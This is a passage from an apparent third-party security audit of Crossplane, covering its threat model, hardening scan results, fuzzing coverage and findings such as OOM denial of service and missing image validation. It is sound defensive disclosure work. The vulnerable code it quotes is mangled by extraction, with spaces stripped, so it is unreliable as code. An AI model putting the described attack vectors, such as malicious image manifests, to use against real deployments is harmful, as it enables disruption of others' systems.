nuse\nand\nmust\nbe\nsecured\nagainst\nprivilege\nescalations.Threat\nactors\nA\nthreat\nactor\nis\nan\nindividual\nor\ngroup\nthat\nintentionally\nattempts\nto\nexploit\nvulnerabilities,\ndeploys\nmalicious\ncode,\nor\ncompromise\nor\ndisrupt\na\nCrossplane\ndeployment,\no\u0000en\nfor\nfinancial\ngain,\nespionage,\nor\nsabotage.\nWe\nidentify\nthe\nfollowing\nthreat\nactors\nfor\nCrossplane.\nA\nthreat\nactor\ncan\nassume\nmultiple\nprofiles\nfrom\nthe\ntable\nbelow;\nfor\nexample,\na\nfully\nuntrusted\nuser\ncan\nalso\nbe\na\ncontributor\nto\na\n3rd-party\nlibrary\nused\nby\nCrossplane.\nActor\nDescription\nHave\nalready \nescalated\nprivileges\nFully\nuntrusted \nusers\nUsers\nthat\nhave\nnot\nbeen\ngranted\nany\nprivileges.\nNo\nPlatform\nauthors\nUsers\nthat\nare\nresponsible\nfor\nconfiguring\nCrossplane,\ne.g.,\ninstalling\nproviders/configurations,\ncreating\ncompositions,\nsetting\nup\ncloud\ncredentials,\netc.\nNo\nPlatform\nconsumers\nApp\ndevelopers\nwho\nconsume\nthe\nplatform\nAPI\nthrough\nclaims.\nThey\nhave\nlimited\npermissions\nvia\nRBAC.\nThey\ndo\nnot\nhave\npermission\nto\ninstall\na\nprovider\nfor\nexample.\nNo\nContributors\nto \n3rd-party\ndependencies\nContributors\nto\ndependencies\nused\nby \nCrossplane.\nNo\nWell-funded \ncriminal\ngroups\nOrganised\ncriminal\ngroups\nthat\no\u0000en\nhave \neither\npolitical\nor\neconomic\ngoals.\nNoAttacker\nobjectives\nIn\nthis\nsection,\nwe\nenumerate\ncommon\nobjectives\nobserved\nin\nthe\nwild\namongst\nattacks\nagainst\ncloud-native\nsystems\nthat\napply\nto\nCrossplane.\nSteal\ncompute\npower\nThreat\nactors\nmay\nseek\nto\ncompromise\na\nCrossplane\ndeployment\nto\nsteal\ncomputational\nresources.\nThis\nis\na\ncommon\nattack\nvector\nfor\ncloud-based\ninfrastructure,\nand\nthere\nare\nnumerous\nexamples\nof\nsuch\nattacks\nin\nthe\nwild\n1\n2\n.\nThe\nattacker\nwill\no\u0000en\nattempt\nto\ngenerate\nnew\nworkloads\nthat\nrun\ncryptominers.\nAttackers\nwill\no\u0000en\nuse\nthe\nMonero\ncrypto\nminers,\nsince\nthere\nare\nmany\nimages\navailable\npublicly\nto\ndeploy\nMonero\nmining\nworkloads\n3\n.\nFurther\nprivilege\nescalation\nAttackers\nlook\nfor\nvulnerabilities\nthat\ncan\nallow\nthem\nto\nfurther\nmanifest\ntheir\nposition\neven\na\u0000er\nhaving\nalready\nelevated\ntheir\nprivileges.\nOne\nway\nis\nto\nextend\nthe\ntimeframe\nof\nthe\nelevated\nposition\nby\nfinding\na\nway\nto\nmaintain\ntheir\nposition\neven\na\u0000er\nthe\ninitial\nvulnerability\nhas\nbeen\npatched.\nAt\nthe\ntime\nof\nthis\naudit,\nattackers\nare\nactively\nleveraging\nmisconfigurations\nin\nRBAC\nto\ngain\na\nfoothold\ninto\nKubernetes\nclusters\nin\nthe\nwild\nand\nobtain\npersisted\nelevated\nprivileges\n4\n.\nAnother\nway\nthe\nattacker\ncould\nseek\nto\nfurther\ntheir\nposition\nis\nby\nway\nof\nhorizontal\nprivilege\nescalation.\nThis\ncould\nbe\ndone\nby\nattacking\nother\nusers\nof\nthe\nCrossplane\ndeployment\nto\nrun\ncode\non\nthe\nvictims\nmachine,\nsteal\nsecrets,\npretend\nto\nbe\nthe\nvictim\nin\nother\nattacks,\nor\nsomething\nelse.\nA\ndesirable\ngoal\nfor\nany\nattack\nis\nto\nescalate\nprivileges\nall\nthe\nway\nto\nroot.\nAs\nsuch,\nan\nattacker\ncan\nseek\nto\nchain\nvulnerabilities\nstarting\nwith\na\nlow-impact\nvuln\nand\nescalate\nhorizontally\nwith\nother\nhigher-impact\nvulns\nthat\nrequire\nexisting\nprivileges\nto\nexploit.\nDenial\nof\nservice\nAttackers\nmay\nseek\nto\ngain\na\ncompetitive\nadvantage\nby\nlaunching\ndenial-of-service\nattacks\nagainst\nCrossplane\ndeployments.\nThe\nmotivation\nhere\ncould\nbe\nfinancial\nor\nto\ndisrupt\na\ncompetitor's\nresearch\nand\ndevelopment\nefforts.\nDenial\nof\nservice\nattacks\ncan\nalso\ndamage\nthe\nusers\nreputation\nor\nput\nthe\nusers\nin\na\nposition\nwhere\nthey\nbreach\ncontractual\nagreements\nwith\ntheir\npartners,\nthus\nmaking\nthem\nvulnerable\nto\nlegal\naction.\n4\nhttps://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters\n3\nhttps://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/\n2\nhttps://blog.aquasec.com/container-vulnerability-dzmlt-dynamic-container-analysis\n1\nhttps://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-cont \nainer-images-cryptocurrency-miningSteal\nsecrets\nAttackers\nmay\nseek\nto\nsteal\nsecrets\nfrom\nCrossplane\nusers\nto\nobtain\nconfidential,\nhigh-value\ndata\nor\naccess\nto\nother\nsystems\nthat\nthe\nuser\nmanages.C l u s t e r\nh a r d e n i n g\nAda\nLogics\nassessed\nCrossplaneʼs\nhardening\nagainst\nNSAʼs\nKubernetes\nhardening\nguide.\nWe\nused\nKubescape\n5\nto\nscan\nCrossplaneʼs\nYAML\nmanifests\nagainst\nKubescapeʼs\nNSA\nframework\nsetting.\nCrossplane\nscores\nat\n100%\ncompliance\nagainst\nNSAʼs\nKubernetes\nhardening\nguide,\nmeaning\nthat\nno\nresources\nfailed\nwith\nsecurity\nissues\nof\nany\nkind.\nThese\nare\nthe\nfindings\nfrom\nKubescape\nagainst\nboth\nCrossplane\nand\nCrossplane-runtime.\nControls:\n24\n(Failed:\n0,\nPassed:\n24,\nAction\nRequired:\n0\nFailed\nResources\nby\nSeverity:\nCritical\n—\n0,\nHigh\n—\n0,\nMedium\n—\n0,\nLow\n—\n0\nSeverity\nControl\nname\nFailed\nresources\nAll\nResources\n%\nCompliance-score \n(if\nfailed)\nCritical\nAPI\nserver\ninsecure\nport\nis\nenabled\n0\n0\n-1%\nCritical\nDisable\nanonymous\naccess\nto \nKubelet\nservice\n0\n0\n-1%\nCritical\nEnforce\nKubelet\nclient\nTLS \nauthentication\n0\n0\n-1%\nHigh\nResource\nlimits\n0\n0\n-1%\nHigh\nApplications\ncredentials\nin \nconfiguration\nfiles\n0\n0\n-1%\nHigh\nHost\nPID/IPC\nprivileges\n0\n0\n-1%\nHigh\nHostNetwork\naccess\n0\n0\n-1%\nHigh\nInsecure\ncapabilities\n0\n0\n-1%\nHigh\nPrivileged\ncontainer\n0\n0\n-1%\nHigh\nCVE-2021-25742-nginx-ingress-snip \npet-annotation-vu…\n0\n0\n-1%\nMedium\nExec\ninto\ncontainer\n0\n0\n-1%\nMedium\nNon-root\ncontainers\n0\n0\n-1%\nMedium\nAllow\nprivilege\nescalation\n0\n0\n-1%\nMedium\nIngress\nand\nEgress\nblocked\n0\n0\n-1%\nMedium\nAutomatic\nmapping\nof\nservice\n0\n0\n-1%\n5\nhttps://github.com/kubescape/kubescapeaccount\nMedium\nCluster-admin\nbinding\n0\n0\n-1%\nMedium\nContainer\nhostPort\n0\n0\n-1%\nMedium\nCluster\ninternal\nnetworking\n0\n0\n-1%\nMedium\nLinux\nhardening\n0\n0\n-1%\nMedium\nCVE-2021-25741\n-\nUsing\nsymlink\nfor \narbitrary\nhost\n...\n0\n0\n-1%\nMedium\nSecret/ETCD\nencryption\nenabled\n0\n0\n-1%\nMedium\nAudit\nlogs\nenabled\n0\n0\n-1%\nLow\nImmutable\ncontainer\nfilesystem\n0\n0\n-1%\nLow\nPSP\nenabled\n0\n0\n-1%\nResource\nSummary\n0\n0\n0.00%\nWe\nrecommend\nCrossplane\nto\nintegrate\nKubescape\ninto\nCrossplane’s\nCI\npipeline\nto\nmaintain\nthe\nsame\nhigh\nstandard\nover\ntime.Fuzzing\nCrossplane\nhas\na\nfuzzing\nsuite\ncovering\nboth\nthe\nCrossplane\nmain\nrepository\nas\nwell\nas\nthe\nCrossplane-runtime\nrepository.\nThe\nfuzzers\nrun\ncontinuously\non\nOSS-Fuzz,\nwhich\nruns\nthe\nfuzzers\naround\n143\nbillion\ntimes\nevery\nmonth.\nOSS-Fuzz\nfuzzing\nstats\nfrom\n30th\nApril\nto\n30th\nMay\n2023:\nFuzzer\nname\n#\nof\ntimes\nexecuted\n(millions)\nFuzzing\nhours\nFuzzDag\n29,548\n1,642.6\nFuzzFindXpkgInDir\n8,715\n1,188.2\nFuzzForCompositeResourceClaim\n18,778\n1,143.8\nFuzzForCompositeResourceXcrd\n24,347\n1,349.7\nFuzzNewCompositionRevision\n4,532\n1,147.4\nFuzzPackageRevision\n16,263\n1,288.5\nFuzzParse\n1,492\n1,500.3\nFuzzPatchApply\n500\n1,017.3\nFuzzPropagateConnection\n17,782\n1,079.9\nFuzzTransform\n21,525\n1,354\nTotal\n143,482\n12,711.7\nAn\nimportant\nelement\nof\nfuzzing\nis\ncontinuity:\nThe\nfuzzers\nneed\nto\nkeep\nrunning\nto\nkeep\ntesting\nfor\nbugs\nand\nbuild\nup\ntheir\ncorpora.\nCrossplaneʼs\nOSS-Fuzz\nbuild\nhas\nhad\nno\ndowntime\nsince\nthe\ncompletion\nof\nits\nfuzzing\naudit\n6\n.\nCrossplane\nmaintains\nthe\nfuzzers\nin\nthe\nCrossplane\nand\nCrossplane-runtime\nrepositories\nwhich\nallows\nthe\nmaintainers\nto\nquickly\nfix\nany\nbreakages\nshould\nthey\narise.\nIn\naddition\nto\nthe\nfuzzers\nrunning\ncontinuously\nby\nway\nof\nOSS-Fuzz,\nCrossplane\nalso\nruns\nthem\nin\nthe\nCI\npipeline\nthrough\nOSS-Fuzzʼs\nCIFuzz\n7\non\npull\nrequests.\nAs\nsuch,\nthe\nfuzzers\ntest\nfor\nlow-hanging,\neasy-to-find\nissues\non\npull\nrequests\nbefore\nthey\nare\nmerged\ninto\nthe\nproject.\nAn\nadvantage\nof\nusing\nOSS-Fuzzʼs\nCIFuzz\nis\nthat\nit\nstarts\nthe\nfuzz\njob\nwith\nthe\nfull\ncorpus\nthat\nOSS-Fuzz\nhas\naccumulated,\nthereby\nallowing\nthe\nfuzzers\nto\nreach\nfar\ninto\ntheir\ntargets\nat\nevery\nrun.\n7\nhttps://google.github.io/oss-fuzz/getting-started/continuous-integration/\n6\nhttps://blog.crossplane.io/fuzzing-security-audit/ADA\nLogics\nadded\n4\nnew\nfuzzers\nto\nCrossplaneʼs\nfuzzing\nsuite\nand\nimproved\ntheFuzzDag\nfuzzer\nby\nincreasing\nits\ncoverage.\nNew\nfuzzers\nFuzzPTFComposer\nAdds\na\nfuzzer\nthat\ncalls\nseveral\nAPIs\nin\nthe\nsame\norder\nthat\nthe\ncomposite\ncontroller\ndoes.\nTests\nif\nany\nof\nthe\nAPIs\ncan\nbe\ndisrupted\nin\na\nproduction-like\nscenario.\nPR:\nhttps://github.com/crossplane/crossplane/pull/4198\nFuzzRevisionControllerPackageHandling\nTests\nthe\nRevision\ncontrollers\nhandling\nof\nCrossplane\npackages.\nThe\nfuzzerscreates\na\nRevision\nand\nresolves\nits\ndependencies.\nPR:\nhttps://github.com/crossplane/crossplane/pull/4199\nFuzzRenderClusterRoles\nTests\nthe\nRBAC\nmanagers\nrendering\nof\ncluster\nroles.\nPR:\nhttps://github.com/crossplane/crossplane/pull/4201\nFuzzRenderRoles\nTests\nthe\nRBAC\nmanagers\nrendering\nof\ncluster\nroles.\nPR:\nhttps://github.com/crossplane/crossplane/pull/4202\nImproved\nfuzzers\nAda\nLogics\nadded\nmore\ncalls\nto\nthe\nDAG\nfuzzer\nwhich\nwere\nnot\ncovered\nprior\nto\nthe\nsecurity\naudit.\nThis\nimprovement\nresulted\nin\nincreased\ncoverage.\nPR:\nhttps://github.com/crossplane/crossplane/pull/4200Issues\nfound\nHere\nwe\npresent\nthe\nissues\nthat\nwe\nidentified\nduring\nthe\naudit.\n#\nID\nTitle\nSeverity\nFixed\n1\nADA-XP-23-1\nDenial\nof\nservice\nfrom\n3rd-party \nvulnerability\nModerate\nYes\n2\nADA-XP-23-2\nPossible\nOOM\nin\ninternal/xpkg\nLow\nYes\n3\nADA-XP-23-3\nPossible\nOOM\nwhen\nreading\nXfn \ncommand\noutput\nLow\nYes\n4\nADA-XP-23-4\nPossible\nOOM\nwhen\nreading\nXfn \ncommand\noutput\nLow\nYes\n5\nADA-XP-23-5\nDockerfiles\ndo\nnot\nfollow\nbest\npractices \nregarding\nCOPY\nvs\nADD\nLow\nYes\n6\nADA-XP-23-6\nInsufficient\ndocumentation\non\nsecurity \nimplications\nof\nusing\ntags\nfor\nremote \nimages\nLow\nYes\n7\nADA-XP-23-7\nCrossplaneʼs\nOCI\nstore\ndoes\nnot\nvalidate \nfor\ninvariants\nin\nimages\nModerate\nNo\n8\nADA-XP-23-8\ngPRC\nconnection\nnot\nclosed\nLow\nYes\n9\nADA-XP-23-9\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nImage\nbackend\nModerate\nYes\n10\nADA-XP-23-10\nDenial\nof\nservice\nfrom\nmalicious \nCrossplane\npackage\nModerate\nYes\n11\nADA-XP-23-11\nPossible\nimage\ntampering\nfrom\nmissing \nimage\nvalidation\nHigh\nYes\n12\nADA-XP-23-12\nPossible\nendless\ndata\nattack\nin \nProviderRevision\ncontroller\nModerate\nYes\n13\nADA-XP-23-13\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nI\nModerate\nYes\n14\nADA-XP-23-14\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nII\nModerate\nYes\n15\nADA-XP-23-15\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nIII\nModerate\nYes\n16\nADA-XP-23-16\nDenial\nof\nservice\nfrom\nlarge\nimage\nLow\nYesIssues\nfound\nin\nalpha\nfeatures\nSeveral\nof\nthe\nissues\nwere\nfound\nin\nalpha\ncomponents\nof\nCrossplane.\nThese\nissues\nhave\nbeen\nscored\nby\nthe\nsame\nmetrics\nas\nissues\nfound\nin\nnon-alpha\ncomponents.\nThe\nissues\nfound\nin\nalpha\ncomponents\nare:\n#\nID\nTitle\nSeverity\nFixed\n3\nADA-XP-23-3\nPossible\nOOM\nwhen\nreading\nXfn \ncommand\noutput\nLow\nYes\n4\nADA-XP-23-4\nPossible\nOOM\nwhen\nreading\nXfn \ncommand\noutput\nLow\nYes\n7\nADA-XP-23-7\nCrossplaneʼs\nOCI\nstore\ndoes\nnot\nvalidate \nfor\ninvariants\nin\nimages\nModerate\nNo\n8\nADA-XP-23-8\ngPRC\nconnection\nnot\nclosed\nLow\nYes\n13\nADA-XP-23-13\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nI\nModerate\nYes\n14\nADA-XP-23-14\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nII\nModerate\nYes\n15\nADA-XP-23-15\nPossible\nendless\ndata\nattack\nin \nCrossplaneʼs\nOCI\nstore\nIII\nModerate\nYes\nCVEs\nThe\nfollowing\nissues\nwere\nassigned\nCVEs:\n#\nID\nTitle\nCVE\nSeverity\n11\nADA-XP-23-11\nPossible\nimage\ntampering\nfrom \nmissing\nimage\nvalidation\nCVE-2023-38495\nHigh\n16\nADA-XP-23-16\nDenial\nof\nservice\nfrom\nlarge\nimage\nCVE-2023-37900\nLowA D A - X P - 2 3 - 1 :\nD e n i a l\no f\ns e r v i c e\nf r o m\n3 r d - p a r t y\nv u l n e r a b i l i t y\nID\nADA-XP-23-1\nComponent\nCrossplane\nOCI\nstore\nSeverity\nModerate\nFixed:\nYes\nIf\nan\nattacker\ncan\ncause\nCrossplane\nto\nfetch\nan\nimage\nwith\na\nmaliciously-cra\u0000ed\nmanifest,\nthe\nattacker\ncan\ncause\na\nDoS\ncondition\nfor\nCrossplane\nfrom\nan\nunrecoverable\nOOM\npanic.\nThis\nwill\ncrash\nthe\nCrossplane\ncontroller\nand\nwill\ncause\na\ntemporary\nDoS\nof\nthe\nnode\naffecting\nother\nservices.\nThe\nroot\ncause\nof\nthe\nissue\nwas\nin\na\n3rd-party\ndependency.\nThe\nissue\nhas\nbeen\nfixed.\nAda\nLogics\nhas\nrequested\nissuance\nof\na\nCVE\nwhich\nhas\nnot\nbeen\nconfirmed.\nThe\nattacker\nwill\nneed\nto\ncompromise\nthe\nregistry\nfrom\nwhich\nCrossplane\nfetches\nan\nimage\nor\nby\ntricking\nthe\nCrossplane\nuser\ninto\nconsuming\nan\nimage\nby\nway\nof\ndependency\nconfusion\nor\ntyposquatting\nattack\nvectors.\nTo\nlaunch\na\ntargeted\nattack,\nthe\nthreat\nactor\nwill\nneed\nto\nknow\nwhich\nimages\ntheir\nvictim\nconsumes\nin\ntheir\nCrossplane\ndeployment.\nAlternatively,\nthey\ncan\nlaunch\na\nnon-targeted\nattack\nby\ncompromising\nimages\nof\npopular\nand\nwidely-used\nimages.\nOnce\nthe\nattacker\nhas\ncompromised\nthe\nregistry,\nthe\nattack\nvector\nis\nfairly\nsimple,\nand\ncra\u0000ing\nthe\nmalicious\nmanifest\nis\ntrivial.A D A - X P - 2 3 - 2 :\nP o s s i b l e\nO O M\ni n\ni n t e r n a l / x p k g\nID\nADA-XP-23-2\nComponent\nCrossplane\nPackages\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4232\ngithub.com/crossplane/crossplane/blob/master/internal/xpkg.Build()\nis\nsusceptible\nto\nan\nOOM\ncondition\non\nthe\nhighlighted\nline\nbelow\nifbuf\non\nthe\nhighlighted\nline\ncontains\na\nlarge\nbuffer.\nhttps://github.com/crossplane/crossplane/blob/498b2fcbcc5323676d48048944e8a2a6d67cd87a/i\nnternal/xpkg/build.go#L82-L117\n82\n8384858687888990919293949596979899100101102103104105106107108109110111112113114funcBuild(ctxcontext.Context,bparser.Backend,pparser.Parser,lparser.Linter)(v1.Image,error){//GetYAMLstream.r,err:=b.Init(ctx)iferr!=nil{returnnil,errors.Wrap(err,errInitBackend)}deferfunc(){_=r.Close()}()\n//Copystreamoncetoparseandoncewritetotarball.buf:=new(bytes.Buffer)pkg,err:=p.Parse(ctx,annotatedTeeReadCloser(r,buf))iferr!=nil{returnnil,errors.Wrap(err,errParserPackage)}iferr:=l.Lint(pkg);err!=nil{returnnil,errors.Wrap(err,errLintPackage)}\n//Writeon-diskpackagecontentstotarball.tarBuf:=new(bytes.Buffer)tw:=tar.NewWriter(tarBuf)\nhdr:=&tar.Header{Name:StreamFile,Mode:int64(StreamFileMode),Size:int64(buf.Len()),}iferr:=tw.WriteHeader(hdr);err!=nil{returnnil,errors.Wrap(err,errTarFromStream)}if_,err=io.Copy(tw,buf);err!=nil{returnnil,errors.Wrap(err,errTarFromStream)}115116117iferr:=tw.Close();err!=nil{returnnil,errors.Wrap(err,errTarFromStream)}\nIn\nthe\ncase\nof\nan\nexcessively\nlargebuf\non\nline\n112,\nGo\nwill\nperform\na\nsigkill,\nbut\nbefore\ndoing\nso,\nthe\nmachine\nrunning\nCrossplane\nwill\nexperience\na\ntemporary\nDoS\ncondition\nthat\nwill\naffect\nother\nservices\nas\nwell.A D A - X P - 2 3 - 3 :\nP o s s i b l e\nO O M\nw h e n\nr e a d i n g\nX f n\nc o m m a n d\no u t p u t\nID\nADA-XP-23-3\nComponent\nComposite\nFunctions\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4217\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nIf\nan\nattacker\ncan\ncontrol\nthe\ninput\nto\nan\nXfn,\nthey\ncan\ntrigger\nan\nOOM\nDoS\nissue.\nThe\nattacker\nwould\nneed\nto\ncause\nthe\nXfn\nto\ncreate\na\nlarge\nStdout\nbuffer,\nand\nthe\nOOM\nwould\nhappen\nwhen\nCrossplane\nreads\nit\nentirely\ninto\nmemory\non\nthe\nhighlighted\nline:\nhttps://github.com/crossplane/crossplane/blob/b01a0f8c0830f038514714baf24deb7ef21bbad4/c\nmd/xfn/spark/spark.go#L81\n81...132\n133134135136137138139\n140141142143144145146147148...157\n158159160161162func(c*Command)Run()error{...p:=oci.NewCachingPuller(h,store.NewImage(c.CacheDir),&oci.RemoteClient{})img,err:=p.Image(ctx,r,FromImagePullConfig(req.GetImagePullConfig()))iferr!=nil{returnerrors.Wrap(err,errPull)}\n//CreateanOCIruntimebundleforthiscontainerrun.b,err:=s.Bundle(ctx,img,runID,FromRunFunctionConfig(req.GetRunFunctionConfig()))iferr!=nil{returnerrors.Wrap(err,errBundleFn)}\nroot:=filepath.Join(c.CacheDir,ociRuntimeRoot)iferr:=os.MkdirAll(root,0700);err!=nil{_=b.Cleanup()returnerrors.Wrap(err,errMkRuntimeRootdir)}...cmd:=exec.CommandContext(ctx,c.Runtime,\"--root=\"+root,\"run\",\"--bundle=\"+b.Path(),runID)cmd.Stdin=bytes.NewReader(req.GetInput())\nout,err:=cmd.Output()iferr!=nil{_=b.Cleanup()163164165166167168169170171172173174175176returnerrors.Wrap(err,errRuntime)}iferr:=b.Cleanup();err!=nil{returnerrors.Wrap(err,errCleanupBundle)}\nrsp:=&v1alpha1.RunFunctionResponse{Output:out}pb,err=proto.Marshal(rsp)iferr!=nil{returnerrors.Wrap(err,errMarshalResponse)}_,err=os.Stdout.Write(pb)returnerrors.Wrap(err,errWriteResponse)}A D A - X P - 2 3 - 4 :\nP o s s i b l e\nO O M\nw h e n\nr e a d i n g\nX f n\nc o m m a n d\no u t p u t\nID\nADA-XP-23-4\nComponent\nComposite\nFunctions\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4217\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nThis\nissue\nis\nsimilar\nto\nADA-XP-23-3\nin\nroot\ncause,\nattack\nvector\nand\nimpact.\nhttps://github.com/crossplane/crossplane/blob/b01a0f8c0830f038514714baf24deb7ef21bbad4/internal/xfn\n/container_linux.go#L83\n83\n...\n138139140141142143144145146147148149150151152153...157158159160...163164165166167168func(r*ContainerRunner)RunFunction(ctxcontext.Context,req*v1alpha1.RunFunctionRequest)(*v1alpha1.RunFunctionResponse,error){...\nstdio,err:=StdioPipes(cmd,r.rootUID,r.rootGID)iferr!=nil{returnnil,errors.Wrap(err,errCreateStdioPipes)}\nb,err:=proto.Marshal(req)iferr!=nil{returnnil,errors.Wrap(err,errMarshalRequest)}iferr:=cmd.Start();err!=nil{returnnil,errors.Wrap(err,errStartSpark)}if_,err:=stdio.Stdin.Write(b);err!=nil{returnnil,errors.Wrap(err,errWriteRequest)}\niferr:=stdio.Stdin.Close();err!=nil{returnnil,errors.Wrap(err,errCloseStdin)}\nstdout,err:=io.ReadAll(stdio.Stdout)iferr!=nil{returnnil,errors.Wrap(err,errReadStdout)}\nstderr,err:=io.ReadAll(stdio.Stderr)169170171172...180iferr!=nil{returnnil,errors.Wrap(err,errReadStderr)}\n...}A D A - X P - 2 3 - 5 :\nD o c k e r fi l e s\nd o\nn o t\nf o l l o w\nb e s t\np r a c t i c e s\nr e g a r d i n g\nC O P Y\nv s\nA D D\nID\nADA-XP-23-5\nComponent\nCrossplane\nCluster \nImages\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4173\nDockers\nbest\npractices\ndocumentation\nrecommends\nusingCOPY\ninstead\nofADD\n:\nhttps://docs.docker.com/develop/develop-images/dockerfile_best-practices/#add-or-copy\nCrossplane\ndoes\nnot\nfollow\nthis\nbest\npractices\nthe\nfollowing\nplaces:\nhttps://github.com/crossplane/crossplane/blob/192a09266e10f1873020201043b5782cdef8ce8f/clu\nster/images/xfn/Dockerfile\n14ADDbin/${TARGETOS}\\_${TARGETARCH}/xfn/usr/local/bin/\nhttps://github.com/crossplane/crossplane/blob/19be2ce66814569829d13e9ecc3ba2cfc6b245bb/cl\nuster/images/crossplane/Dockerfile\n67ADDbin/$TARGETOS\\_$TARGETARCH/crossplane/usr/local/bin/ADDcrds/crds\nA D A - X P - 2 3 - 6 :\nI n s u \u0000 c i e n t\nd o c u m e n t a t i o n\no n\ns e c u r i t y\ni m p l i c a t i o n s\no f\nu s i n g\nt a g s\nf o r\nr e m o t e\ni m a g e s\nID\nADA-XP-23-6\nComponent\nCrossplane \nDocumentation\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/docs/pull/465\nThe\nCrossplane\ndocumentation\nrecommends\nreferencing\nimages\nwith\ndigests\nrather\nthan\ntags.\nHowever,\nthe\ndocumentation\ndoes\nnot\nmention\nthe\nsecurity\nconcerns\nof\nreferencing\nby\ntags.\nWhen\nreferencing\nan\nimage\nby\ntag,\nusers\nmay\nreceive\na\ndifferent\nimage\nthan\nthey\nexpect,\nand\nit\nis\nharder\nto\nvalidate\nthe\nreceived\nimage.\nThis\nmakes\nit\neasy\nfor\nan\nattacker\nto\ntamper\nwith\nan\nimage\nand\navoid\ndetection\nin\ncase\nof\na\nsuccessful\nattack\nagainst\nthe\nCrossplane\nuser.\nCrossplane\nusers\nconsuming\npackages\nfrom\na\nprivate\nregistry\nare\nalso\naffected\nby\nthis\nsince\nattackers\ncan\ncompromise\nthe\nregistry\nand\nchange\nthe\nunderlying\nimage\nthat\na\ntag\nrefers\nto.\nWe\nrecommend\nmaking\nit\nexplicit\nin\nthe\ndocumentation\nthat\nreferencing\nimages\nby\ntag\nhas\nconsiderate\nsecurity\ndownsides.A D A - X P - 2 3 - 7 :\nC r o s s p l a n e ’ s\nO C I\ns t o r e\nd o e s\nn o t\nv a l i d a t e\nf o r\ni n v a r i a n t s\ni n\ni m a g e s\nID\nADA-XP-23-7\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nModerate\nFixed:\nNo\nThis\nissue\naffects\nan\nalpha\nfeature\nin\nCrossplane.\nIt\nhas\nnot\nbeen\nfixed\nby\nthe\ncompletion\nof\nthe\nsecurity\naudit,\nbut\nCrossplane\nis\nworking\non\na\nfix\nhere:\nhttps://github.com/crossplane/crossplane/pull/4214\nCrossplaneʼs\nOCI\nstore\ndoes\nnot\nvalidate\nlayers,\nconfig\nand\nmanifests\nof\nimages.\nCrossplane\nuses\ngithub.com/google/go-containerregistry\nfor\nthe\nunderlying\nimage\ninterface.\ngo-containerregistry\nhas\na\nvalidation\nAPI\nfor\nimages\nwhich\nis\navailable\nhere:\nhttps://github.com/google/go-containerregistry/blob/ca48523123223c5ea478501e6cb1a9\n1a64a8a049/pkg/v1/validate/image.go#L30\n.\nThis\nAPI\nvalidates\nthe\nlayers,\nconfigs\nand\nmanifests\nof\nan\nimage\nand\nreturns\nan\nerror\nif\nany\nstep\nof\nthe\nvalidation\nfails.\nCrossplane\nuses\nthis\nvalidation\nAPI\nwhen\nwriting\na\nsupplied\nimage\nto\nthe\nOCI\nstore:\nhttps://github.com/crossplane/crossplane/blob/498b2fcbcc5323676d48048944e8a2a6d67cd87a/i\nnternal/oci/store/store.go#L158\n145146147148149150151152154154...158\n159func(i*Image)Image(hociv1.Hash)(ociv1.Image,error){uncompressed:=image{root:i.root,h:h}\n...//returnanerror.oi,err:=partial.UncompressedToImage(uncompressed)iferr!=nil{returnnil,errors.Wrap(err,errPartial)}\n...returnoi,errors.Wrap(validate.Image(oi,validate.Fast),errInvalidImage)}\nThis\nAPI\nis\ncalled\nin\nbefore\nwriting\nthe\nimage\nto\nthe\nlocal\nstore\nhere:https://github.com/crossplane/crossplane/blob/498b2fcbcc5323676d48048944e8a2a6d67cd87a/i\nnternal/oci/store/store.go#L168\n162163164165166167168169170171...216func(i*Image)WriteImage(imgociv1.Image)error{d,err:=img.Digest()iferr!=nil{returnerrors.Wrap(err,errGetDigest)}\nif_,err=i.Image(d);err==nil{//Imagealreadyexistsinthestore.returnnil}...}\nThis\nusage\nof\nthe\ngo-containerregistrys\nvalidation\nAPI\nwill\nnot\ncatch\nvalidation\nerrors,\nsince\nCrossplane\ndoes\nnot\ncatch\nerrors.\nAs\nsuch,\nif\nany\nlayers\nin\nthe\nimage\nhave\nbeen\ntampered\nwith,\nCrossplane\nwill\nnot\nvalidate\nand\ncatch\nthis\nto\nprevent\nthe\nuser\nfrom\nconsuming\nthe\nimage.A D A - X P - 2 3 - 8 :\ng P R C\nc o n n e c t i o n\nn o t\nc l o s e d\nID\nADA-XP-23-8\nComponent\nCrossplaneʼs\nOCI\nstore\nSeverity\nLow\nFixed\nin:\nhttps://github.com/crossplane/crossplane/pull/4174\nThis\nissue\nimpacts\nan\nalpha-feature\nin\nCrossplane.\nCrossplane\nkeeps\nthe\ngRPC\nconnection\nof\ncomposite\nfunctions\nopen\nin\ncase\nany\nof\nthe\npassed\noptions\nfail:\nhttps://github.com/crossplane/crossplane/blob/001d0577249ebb4fcb0d315bf7eb452d5dc5b1ad/i\nnternal/controller/apiextensions/composite/composition_ptf.go#L793-L820\n793\n794795796797789799800801802803804\n805806807808809810811812813814815816817818819820821822funcRunFunction(ctxcontext.Context,fnio*iov1alpha1.FunctionIO,fn*v1.ContainerFunction,o...ContainerFunctionRunnerOption)(*iov1alpha1.FunctionIO,error){in,err:=yaml.Marshal(fnio)iferr!=nil{returnnil,errors.Wrap(err,errMarshalFnIO)}\ntarget:=DefaultTargetiffn.Runner!=nil&&fn.Runner.Endpoint!=nil{target=*fn.Runner.Endpoint}\nconn,err:=grpc.DialContext(ctx,target,grpc.WithTransportCredentials(insecure.NewCredentials()))iferr!=nil{returnnil,errors.Wrap(err,errDialRunner)}\nreq:=&fnv1alp